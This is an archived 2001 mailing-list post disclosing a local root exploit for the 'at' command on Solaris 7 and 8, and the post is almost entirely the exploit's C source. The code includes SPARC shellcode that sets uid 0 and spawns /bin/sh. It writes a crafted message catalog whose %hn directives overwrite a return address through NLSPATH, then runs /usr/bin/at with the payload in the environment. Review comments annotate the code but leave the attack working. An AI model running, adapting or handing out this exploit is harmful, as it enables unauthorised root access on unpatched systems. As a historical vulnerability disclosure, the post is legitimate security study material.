Re: "at" is vulnerable on Solaris 7 and 8

From: Hank Wang (hywangat_private)
Date: Thu Jul 05 2001 - 03:36:44 PDT


    Hi all, 
    
    I am sorry for not checking more carefully.
    In fact, Sun already had the patch before I found this... :p
    
    Here is the exploit...
    --
    Huang-Yu Wang
    hankat_private
    
    --
    
    /*
      NLSPATH, gettext() vulnerable on Solaris/SPARC 7, 8
      by Hank Wang <hankat_private>
    
      1. use dump mode to dump memory
      2. alignment of shellcode and command arguments
      3. get the address of shellcode and stack skip
      4. return address location is top address - 0x10
      5. run exploit mode with parameters
    */
    #include <stdio.h>
    #define SHADDR 0xFFBEFF6C
    #define RETLOC 0xFFBEF5BC
    #define SKIP 607
    #define NOP "\x92\x12\x40\x09"
    
    /*
     * SPARC machine code, one 32-bit instruction per element; the mnemonics
     * are the original author's.  main() copies this array as a C string
     * (strcat(eggshell, p) with p = (char *)&shellcode), so the only word that
     * may contain a 0x00 byte is the final 0x00000000 terminator -- none of
     * the instruction words above it does.  This assumes a 32-bit unsigned
     * long (32-bit Solaris/SPARC build); with 64-bit longs every element would
     * carry zero padding bytes and the copy would stop at the first of them.
     */
    unsigned long shellcode[]= {
            // setuid 0
            0x901a4009,     // xor %o1, %o1, %o0
            0x82102017,     // mov 0x17, %g1
            0x91d02008,     // ta 8
            // dup2
            0x90102002,     // mov 2,%o0
            0x94102001,     // mov 1,%o2
            0x92102009,     // mov 9,%o1
            0x8210203e,     // mov 0x3e,%g1
            0x91d02008,     // ta 8
            // execve /bin/sh
            0x9422800a,     // sub  %o2, %o2, %o2
            0x9023a008,     // sub  %sp, 8, %o0
            0x210bd89a,     // sethi  %hi(0x2f626800), %l0
            0xa014216e,     // or  %l0, 0x16e, %l0
            0xe023bff8,     // st  %l0, [ %sp + -8 ]
            0x210bdcda,     // sethi  %hi(0x2f736800), %l0
            0xe023bffc,     // st  %l0, [ %sp + -4 ]
            0x9223a010,     // sub  %sp, 0x10, %o1
            0xd023bff0,     // st  %o0, [ %sp + -16 ]
            0xc023bff4,     // clr  [ %sp + -12 ]
            0x8210203b,     // mov  0x3b, %g1
            0x91d02008,     // ta  8
            // terminator: the one zero byte strcat() in main() stops at
            0x00000000
    };
    
    /* Mode flags; mygetopt() sets exactly one of them to 1. */
    int dump = 0;
    int exploit = 0;

    /* Alignment pads (reduced modulo 4 by mygetopt()) and the number of
     * argument words to skip before the %hn directives; see usage(). */
    int shpad = 0;
    int argpad = 2;
    int skip = SKIP;

    /* Shellcode address and return-address location, both overridable
     * with --shaddr= / --retloc= (hexadecimal). */
    unsigned long shaddr = SHADDR;
    unsigned long retloc = RETLOC;
    
    /*
     * Print the command-line synopsis for `prog` to stdout and terminate the
     * process with status 0.  Never returns.
     */
    void usage(char *prog)
    {
      static const char *const option_help[] = {
        "parameters:",
        "\t--skip=<skip stack>",
        "\t--argpad=<num>: alignment of command args",
        "\t--shpad=<num>: alignment of shellcode",
        "\t--shaddr=<shellcode addr>",
        "\t--retloc=<return address location>",
      };
      size_t n;

      printf("%s [dump|exploit] [parameters]\n", prog);
      for (n = 0; n < sizeof option_help / sizeof option_help[0]; n++) {
        puts(option_help[n]);
      }
      exit(0);
    }
    
    /* Return the text following `prefix` when `arg` starts with it, else NULL. */
    static const char *optval(const char *arg, const char *prefix)
    {
      size_t plen = strlen(prefix);

      if (strncmp(arg, prefix, plen) != 0) {
        return NULL;
      }
      return arg + plen;
    }

    /*
     * Parse the command line into the file-scope settings.
     *
     * argv[1] selects the mode: "dump" or "exploit".  Only the first four
     * characters are compared (kept from the original), so "expl" also
     * selects exploit mode.  argv[2..] are --name=value options overriding
     * skip, shpad, argpad, shaddr and retloc; the pads are reduced modulo 4
     * and the addresses are parsed as hexadecimal.
     *
     * Returns 1 on success, -1 for an unknown mode or option.  The caller
     * must guarantee argc >= 2.
     */
    int mygetopt(int argc, char **argv)
    {
      const char *mode = argv[1];
      int argi;

      if (strncmp(mode, "dump", 4) == 0) {
        dump = 1;
      } else if (strncmp(mode, "exploit", 4) == 0) {
        exploit = 1;
      } else {
        return -1;
      }

      for (argi = 2; argi < argc; argi++) {
        const char *arg = argv[argi];
        const char *val;

        if ((val = optval(arg, "--skip=")) != NULL) {
          skip = atoi(val);
        } else if ((val = optval(arg, "--shpad=")) != NULL) {
          shpad = atoi(val) % 4;
        } else if ((val = optval(arg, "--argpad=")) != NULL) {
          argpad = atoi(val) % 4;
        } else if ((val = optval(arg, "--shaddr=")) != NULL) {
          shaddr = strtoul(val, NULL, 16);
        } else if ((val = optval(arg, "--retloc=")) != NULL) {
          retloc = strtoul(val, NULL, 16);
        } else {
          return -1;
        }
      }
      return 1;
    }
    
    /*
     * Write foo.po and compile it with msgfmt(1) into a message catalog named
     * SUNW_OST_OSCMD in the current directory.  The catalog maps at(1)'s
     * message "commands will be executed using %s\n" (the msgid written below)
     * to the msgstr assembled in `msg`.
     *
     * Layout of the msgstr: q quoted rows of 8 conversion directives plus a
     * final quoted row of r directives, with skip = 8*q + r and 1 <= r <= 8.
     * Each directive consumes one argument word when the string is later
     * formatted -- presumably from the stack of the process that formats it,
     * which is what the "skip stack" option in usage() appears to refer to.
     *
     *   dump mode:    skip x "%08x", so the consumed words are printed.
     *   exploit mode: skip x "%0<w>x" followed by "%hn%0<last>x%hn".  The
     *                 widths are chosen so that the running character count
     *                 equals the low 16 bits of shaddr when the first %hn runs
     *                 and the high 16 bits when the second one runs (see the
     *                 first/next/last arithmetic).  That relies on every %x
     *                 printing exactly its field width, and on
     *                 (shaddr >> 16) >= (shaddr & 0xffff): otherwise `last` is
     *                 negative and "%0-<n>x" is emitted, where '-' is parsed
     *                 as a flag rather than as part of the width.
     *
     * NOTE(review): fopen() is unchecked, so a NULL fp is handed to fprintf().
     * NOTE(review): msg is a fixed 4096-byte buffer filled by unbounded
     * strcat(); the default skip=607 fits, but larger --skip values overflow it.
     * NOTE(review): skip == 0 divides by zero in the exploit branch.
     */
    void makemo()
    {
      char msg[4096], pattern[16];
      FILE *fp;
      int i, j, r, q;
      unsigned long hw;
      int first, next, last;
      
      /* Split skip into q full rows of 8 directives plus a last row of r (1..8). */
      r=skip%8;
      r=r?r:8;
      q=skip/8;
      q=(r==8)?q-1:q;
    
      memset(msg, 0x00, 4096);
    
      strcpy(msg, "msgstr ");
      if (exploit) {
        /* hw    = low 16 bits of shaddr
         * first = width of the first skip-1 directives, next = width of the
         *         last one, so that first*(skip-1) + next == hw
         * last  = characters still needed after hw to reach shaddr >> 16
         *         (assumed non-negative; see the header comment)             */
        hw=(shaddr & 0x0000ffff);
        first=(hw/skip);
        next=hw-(first*(skip-1));
        last=((shaddr & 0xffff0000) >> 16) - hw;
        /* pattern is "%0<first>x"; at most 15 bytes for a 32-bit int. */
        sprintf(pattern, "%%0%dx", first);
        for(i=0; i<q; i++) {
          strcat(msg, "\"");
          for(j=0; j<8; j++) {
            strcat(msg, pattern);
          }
          strcat(msg, "\"\n");
        }
        /* Last row: r-1 directives of width first, then one of width next. */
        strcat(msg, "\"");
        for(j=0; j<r-1; j++) {
          strcat(msg, pattern);
        }
        sprintf(pattern, "%%0%dx", next);
        strcat(msg, pattern);
        strcat(msg, "\"\n");
    
        /* Final row: "%hn%0<last>x%hn". */
        strcat(msg, "\"");
        strcat(msg, "%hn");
        sprintf(pattern, "%%0%dx", last);
        strcat(msg, pattern);
        strcat(msg, "%hn");
        strcat(msg, "\"\n");
      }
      else {
        /* dump mode: rows of eight "%08x", each row ending in an escaped
         * newline ("\n" inside the .po string) plus a real newline. */
        for(i=0; i<q; i++) 
          strcat(msg, "\"%08x %08x %08x %08x %08x %08x %08x %08x\\n\"\n");
        strcat(msg, "\"");
        for(i=0; i<r-1; i++)
          strcat(msg, "%08x ");
        strcat(msg, "%08x");
        strcat(msg, "\\n\"\n");
      }
    
      /* NOTE(review): fopen() result is not checked before use. */
      fp=fopen("foo.po", "w");
    
      fprintf(fp, "%s\n", "msgid \"commands will be executed using %s\\n\"");
      fprintf(fp, "%s", msg);
      fclose(fp);
    
      /* Compile the .po into the catalog that, per the header comment, the
       * NLSPATH=:. environment set in main() makes gettext() pick up. */
      system("msgfmt -o SUNW_OST_OSCMD foo.po");
    }
    
    /*
     * Build the name of the file handed to "at -f" and create it with touch(1).
     *
     * `file` must be an empty, zero-filled buffer of at least 17 bytes (main()
     * passes a 20-byte one).  The name is appended in this order:
     *   argpad x 'A' | 4 raw bytes of high | "AAAA" | 4 raw bytes of low | (4-argpad) x 'A'
     * with high = retloc+2 and low = retloc.  The raw bytes are read straight
     * out of the unsigned longs, so they are in host byte order (big-endian
     * on SPARC) and a 32-bit unsigned long is assumed.  Per the header comment
     * (step 4) retloc is where the saved return address lives; that these two
     * words are what the %hn directives built by makemo() consume is inferred
     * from the header comment, not shown in this code.
     *
     * NOTE(review): strncat() stops at the first NUL, so a retloc containing a
     * 0x00 byte yields a truncated name; the bytes also reach the shell
     * unquoted through system(), so shell-special bytes break the command.
     * NOTE(review): declared int but has no return statement; main() ignores
     * the result.
     */
    int makefile(char *file)
    {
      unsigned long high, low;
      char *p;
      char cmd[64];
      
      high=retloc+2;  
      low=retloc;
    
      /* Leading pad shifts the address words' alignment ("alignment of
       * command args" in usage()); the trailing pad restores a 16-byte total. */
      strncat(file, "AAAA", argpad); 
      p=(char *)&high;
      strncat(file, p, 4);
      strcat(file, "AAAA");
      p=(char *)&low;
      strncat(file, p, 4);
      strncat(file, "AAAA", 4-argpad);
      /* "touch " (6) + at most 16 name bytes + NUL fits in cmd[64]. */
      strcpy(cmd, "touch ");
      strcat(cmd, file);
      system(cmd);
    }
    
    /*
     * Entry point: parse the arguments, build the message catalog (makemo) and
     * the crafted file name (makefile), then exec /usr/bin/at with a
     * two-variable environment.
     *
     * EGGSHELL carries shpad pad bytes, four NOP words and the shellcode;
     * NLSPATH=:. makes, per the header comment, gettext() find the
     * SUNW_OST_OSCMD catalog makemo() compiled into the current directory.
     *
     * NOTE(review): shaddr and retloc are unsigned long but printed with %08x;
     * on 32-bit SPARC the sizes happen to match, the conforming form is %08lx.
     * NOTE(review): execle() returns only on failure and its result is not
     * checked; main then falls off the end without returning a value.
     */
    int main(int argc, char *argv[])
    {
      char *prog;
      char file[20];            /* 16 name bytes + NUL, filled by makefile() */
      char eggshell[128];       /* 9 + shpad + 16 + 72 + (4-shpad) = 101 bytes + NUL,
                                   assuming 18 non-zero 32-bit shellcode words */
      char nlspath[]="NLSPATH=:.";
      int i;
      char *p=(char *)&shellcode;   /* shellcode viewed as a NUL-terminated byte string */
      char *env[3]={eggshell, nlspath, NULL};
    
      prog=argv[0];
      /* usage() calls exit(0), so neither branch below returns here. */
      if(argc < 2) {
        usage(prog);
      }
      if (mygetopt(argc, argv)==-1) {
        usage(prog);
      }
      printf("skip=%d, shaddr=0x%08x, retloc=0x%08x\n", skip, shaddr, retloc);
      fflush(stdout);
    
      makemo();
      /* makefile() appends with strncat(), so file must start out empty. */
      memset(file, 0x00, 20);
      makefile(file);
    
      /* EGGSHELL= | shpad x 'A' | 4 x NOP | shellcode bytes | (4-shpad) x 'A' */
      memset(eggshell, 0x00, 128);
      strcpy(eggshell, "EGGSHELL=");
      strncat(eggshell, "AAAA", shpad);
      for(i=0; i<4; i++)
        strcat(eggshell, NOP);
      strcat(eggshell, p);
      strncat(eggshell, "AAAA", 4-shpad);
    
    
      /* NOTE(review): no error handling if execle() fails. */
      execle("/usr/bin/at", "at", "-f", file, "-t", "07010100", NULL, env);
    }
    


